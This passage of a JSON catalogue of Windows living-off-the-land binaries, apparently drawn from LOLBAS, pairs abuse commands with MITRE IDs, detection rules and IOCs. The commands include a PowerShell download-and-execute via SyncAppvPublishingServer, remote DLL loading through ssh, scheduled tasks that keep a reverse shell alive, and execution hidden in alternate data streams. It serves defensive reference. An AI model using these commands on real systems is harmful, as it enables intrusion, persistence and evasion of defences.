the ADS.","usecase":"Execute binary file hidden inside an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml"},{"type":"IOC","value":"Unexpected service creation"},{"type":"IOC","value":"Unexpected service modification"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Sc/"]},{"id":"lolbas:sc-exe:1","toolId":"lolbas:sc-exe","toolName":"Sc.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"sc config {ExistingServiceName} binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" & sc start {ExistingServiceName}","description":"Modifies an existing service and executes the file stored in the ADS.","usecase":"Execute binary file hidden inside an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml"},{"type":"IOC","value":"Unexpected service creation"},{"type":"IOC","value":"Unexpected service modification"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Sc/"]},{"id":"lolbas:schtasks-exe:0","toolId":"lolbas:schtasks-exe","toolName":"Schtasks.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"schtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr \"{CMD}\"","description":"Create a recurring task to execute every minute.","usecase":"Create a recurring task to keep reverse shell session(s) alive","mitre":["T1053.005"],"privilege":"user","fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml"},{"type":"IOC","value":"Suspicious task creation events"}],"references":["https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/","https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"]},{"id":"lolbas:schtasks-exe:1","toolId":"lolbas:schtasks-exe","toolName":"Schtasks.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"schtasks /create /s targetmachine /tn \"MyTask\" /tr \"{CMD}\" /sc daily","description":"Create a scheduled task on a remote computer for persistence/lateral movement","usecase":"Create a remote task to run daily relative to the the time of creation","mitre":["T1053.005"],"privilege":"admin","fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml"},{"type":"IOC","value":"Suspicious task creation events"}],"references":["https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/","https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"]},{"id":"lolbas:scp-exe:0","toolId":"lolbas:scp-exe","toolName":"scp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"scp.exe -o ProxyCommand=\"{CMD}\" . localhost:.","description":"Spawns specified command from `scp.exe` -> `ssh.exe`, even if no SSH server is running on localhost (or any other address specified).","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`scp.exe` executions referencing `ProxyCommand`."}],"references":["https://gtfobins.org/gtfobins/scp/","https://lolbas-project.github.io/lolbas/Binaries/scp/"]},{"id":"lolbas:scp-exe:1","toolId":"lolbas:scp-exe","toolName":"scp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"scp.exe -S \"{CMD}\" . localhost:.","description":"Spawns specified command from `scp.exe` -> `ssh.exe`, even if no SSH server is running on localhost (or any other address specified).","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`scp.exe` executions referencing `ProxyCommand`."}],"references":["https://gtfobins.org/gtfobins/scp/","https://lolbas-project.github.io/lolbas/Binaries/scp/"]},{"id":"lolbas:scriptrunner-exe:0","toolId":"lolbas:scriptrunner-exe","toolName":"Scriptrunner.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Scriptrunner.exe -appvscript {PATH:.exe}","description":"Executes executable","usecase":"Execute binary through proxy binary to evade defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml"},{"type":"IOC","value":"Scriptrunner.exe should not be in use unless App-v is deployed"}],"references":["https://twitter.com/KyleHanslovan/status/914800377580503040","https://twitter.com/NickTyrer/status/914234924655312896","https://github.com/MoooKitty/Code-Execution","https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"]},{"id":"lolbas:scriptrunner-exe:1","toolId":"lolbas:scriptrunner-exe","toolName":"Scriptrunner.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ScriptRunner.exe -appvscript {PATH_SMB:.cmd}","description":"Executes cmd file from remote server","usecase":"Execute binary through proxy binary from external server to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml"},{"type":"IOC","value":"Scriptrunner.exe should not be in use unless App-v is deployed"}],"references":["https://twitter.com/KyleHanslovan/status/914800377580503040","https://twitter.com/NickTyrer/status/914234924655312896","https://github.com/MoooKitty/Code-Execution","https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"]},{"id":"lolbas:setres-exe:0","toolId":"lolbas:setres-exe","toolName":"Setres.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"setres.exe -w 800 -h 600","description":"Sets the resolution and then launches 'choice' command from the working directory.","usecase":"Executes arbitrary code","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\setres.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml"},{"type":"IOC","value":"Unusual location for choice.exe file"},{"type":"IOC","value":"Process created from choice.com binary"},{"type":"IOC","value":"Existence of choice.cmd file"}],"references":["https://twitter.com/0gtweet/status/1583356502340870144","https://lolbas-project.github.io/lolbas/Binaries/Setres/"]},{"id":"lolbas:settingsynchost-exe:0","toolId":"lolbas:settingsynchost-exe","toolName":"SettingSyncHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SettingSyncHost -LoadAndRunDiagScript {PATH:.exe}","description":"Execute file specified in %COMSPEC%","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml"},{"type":"IOC","value":"SettingSyncHost.exe should not be run on a normal workstation"}],"references":["https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"]},{"id":"lolbas:settingsynchost-exe:1","toolId":"lolbas:settingsynchost-exe","toolName":"SettingSyncHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat}","description":"Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\\Windows\\System32.","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml"},{"type":"IOC","value":"SettingSyncHost.exe should not be run on a normal workstation"}],"references":["https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"]},{"id":"lolbas:sftp-exe:0","toolId":"lolbas:sftp-exe","toolName":"Sftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"sftp -o ProxyCommand=\"{CMD}\" .","description":"Spawns ssh.exe which in turn spawns the specified command line. See also this project's entry for ssh.exe.","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"sftp.exe executions with ProxyCommand on the command line"},{"type":"IOC","value":"sftp.exe spawning ssh.exe with ProxyCommand on the command line"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/pull/5414/files"}],"references":["https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/","https://lolbas-project.github.io/lolbas/Binaries/Sftp/"]},{"id":"lolbas:sftp-exe:1","toolId":"lolbas:sftp-exe","toolName":"Sftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"sftp -D \"{CMD}\"","description":"Spawns ssh.exe which in turn spawns the specified command line. See also this project's entry for ssh.exe.","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"sftp.exe executions with ProxyCommand on the command line"},{"type":"IOC","value":"sftp.exe spawning ssh.exe with ProxyCommand on the command line"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/pull/5414/files"}],"references":["https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/","https://lolbas-project.github.io/lolbas/Binaries/Sftp/"]},{"id":"lolbas:sigverif-exe:0","toolId":"lolbas:sigverif-exe","toolName":"Sigverif.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"sigverif.exe","description":"Launch sigverif.exe GUI, click 'Advanced', specify arbitrary executable path as 'log file name', then click 'View Log' to execute the binary.","usecase":"Execute arbitrary programs through a trusted Microsoft-signed binary to bypass application whitelisting.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sigverif.exe","C:\\Windows\\SysWOW64\\sigverif.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"sigverif.exe spawning unexpected child processes"}],"references":["https://twitter.com/0gtweet/status/1457676633809330184","https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Sigverif/"]},{"id":"lolbas:ssh-exe:0","toolId":"lolbas:ssh-exe","toolName":"ssh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ssh localhost \"{CMD}\"","description":"Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.","usecase":"Execute specified command, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"type":"IOC","value":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"type":"IOC","value":"command line arguments specifying execution."}],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"]},{"id":"lolbas:ssh-exe:1","toolId":"lolbas:ssh-exe","toolName":"ssh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ssh -o ProxyCommand=\"{CMD}\" .","description":"Executes specified command from ssh.exe","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"type":"IOC","value":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"type":"IOC","value":"command line arguments specifying execution."}],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"]},{"id":"lolbas:ssh-exe:2","toolId":"lolbas:ssh-exe","toolName":"ssh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ssh -o PKCS11Provider=\"\\\\\\\\127.0.0.1\\\\Temp\\\\example.dll\" win@github.com","description":"Executes a DLL from an SMB share by abusing the PKCS11Provider option. The payload executes upon DLL load (DllMain) and requires exporting C_GetFunctionList to prevent premature termination by `ssh.exe`. Note that all backslashes should be escaped (i.e. every `\\` should be turned into `\\\\`).","usecase":"Performs indirect execution of a specified DLL from a remote share, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"type":"IOC","value":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"type":"IOC","value":"command line arguments specifying execution."}],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"]},{"id":"lolbas:stordiag-exe:0","toolId":"lolbas:stordiag-exe","toolName":"Stordiag.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"stordiag.exe","description":"Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.","usecase":"Possible defence evasion purposes.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml"},{"type":"IOC","value":"systeminfo.exe, fltmc.exe or schtasks.exe or powershell.exe being executed outside of their normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://twitter.com/eral4m/status/1451112385041911809","https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"]},{"id":"lolbas:stordiag-exe:1","toolId":"lolbas:stordiag-exe","toolName":"Stordiag.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"stordiag.exe","description":"Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.","usecase":"Possible defence evasion purposes.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml"},{"type":"IOC","value":"systeminfo.exe, fltmc.exe or schtasks.exe or powershell.exe being executed outside of their normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://twitter.com/eral4m/status/1451112385041911809","https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"]},{"id":"lolbas:syncappvpublishingserver-exe:0","toolId":"lolbas:syncappvpublishingserver-exe","toolName":"SyncAppvPublishingServer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX\"","description":"Example command on how inject Powershell code into the process","usecase":"Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.exe","C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml"},{"type":"IOC","value":"SyncAppvPublishingServer.exe should never be in use unless App-V is deployed"}],"references":["https://twitter.com/monoxgas/status/895045566090010624","https://lolbas-project.github.io/lolbas/Binaries/SyncAppvPublishingServer/"]},{"id":"lolbas:tar-exe:0","toolId":"lolbas:tar-exe","toolName":"Tar.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"tar -cf {PATH}:ads {PATH_ABSOLUTE:folder}","description":"Compress one or more files to an alternate data stream (ADS).","usecase":"Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"type":"IOC","value":"tar.exe extracting files from a remote host within the environment"},{"type":"IOC","value":"Abnormal processes spawning tar.exe"},{"type":"IOC","value":"tar.exe interacting with alternate data streams (ADS)"}],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"]},{"id":"lolbas:tar-exe:1","toolId":"lolbas:tar-exe","toolName":"Tar.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"tar -xf {PATH}:ads","description":"Decompress a compressed file from an alternate data stream (ADS).","usecase":"Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"type":"IOC","value":"tar.exe extracting files from a remote host within the environment"},{"type":"IOC","value":"Abnormal processes spawning tar.exe"},{"type":"IOC","value":"tar.exe interacting with alternate data streams (ADS)"}],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"]},{"id":"lolbas:tar-exe:2","toolId":"lolbas:tar-exe","toolName":"Tar.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"tar -xf {PATH_SMB:.tar}","description":"Extracts archive.tar from the remote (internal) host to the current host.","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"type":"IOC","value":"tar.exe extracting files from a remote host within the environment"},{"type":"IOC","value":"Abnormal processes spawning tar.exe"},{"type":"IOC","value":"tar.exe interacting with alternate data streams (ADS)"}],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"]},{"id":"lolbas:ttdinject-exe:0","toolId":"lolbas:ttdinject-exe","toolName":"Ttdinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"TTDInject.exe /ClientParams \"7 tmp.run 0 0 0 0 0 0 0 0 0 0\" /Launch \"{PATH:.exe}\"","description":"Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.","usecase":"Spawn process using other binary","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml"},{"type":"IOC","value":"Parent child relationship. Ttdinject.exe parent for executed command"},{"type":"IOC","value":"Multiple queries made to the IFEO registry key of an untrusted executable (Ex. \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\payload.exe\") from the ttdinject.exe process"}],"references":["https://twitter.com/Oddvarmoe/status/1196333160470138880","https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"]},{"id":"lolbas:ttdinject-exe:1","toolId":"lolbas:ttdinject-exe","toolName":"Ttdinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams \"7 tmp.run 0 0 0 0 0 0 0 0 0 0\" /launch \"{PATH:.exe}\"","description":"Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.","usecase":"Spawn process using other binary","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml"},{"type":"IOC","value":"Parent child relationship. Ttdinject.exe parent for executed command"},{"type":"IOC","value":"Multiple queries made to the IFEO registry key of an untrusted executable (Ex. \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\payload.exe\") from the ttdinject.exe process"}],"references":["https://twitter.com/Oddvarmoe/status/1196333160470138880","https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"]},{"id":"lolbas:tttracer-exe:0","toolId":"lolbas:tttracer-exe","toolName":"Tttracer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"tttracer.exe {PATH_ABSOLUTE:.exe}","description":"Execute specified executable from tttracer.exe. Requires administrator privileges.","usecase":"Spawn process using other binary","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Parent child relationship. Tttracer parent 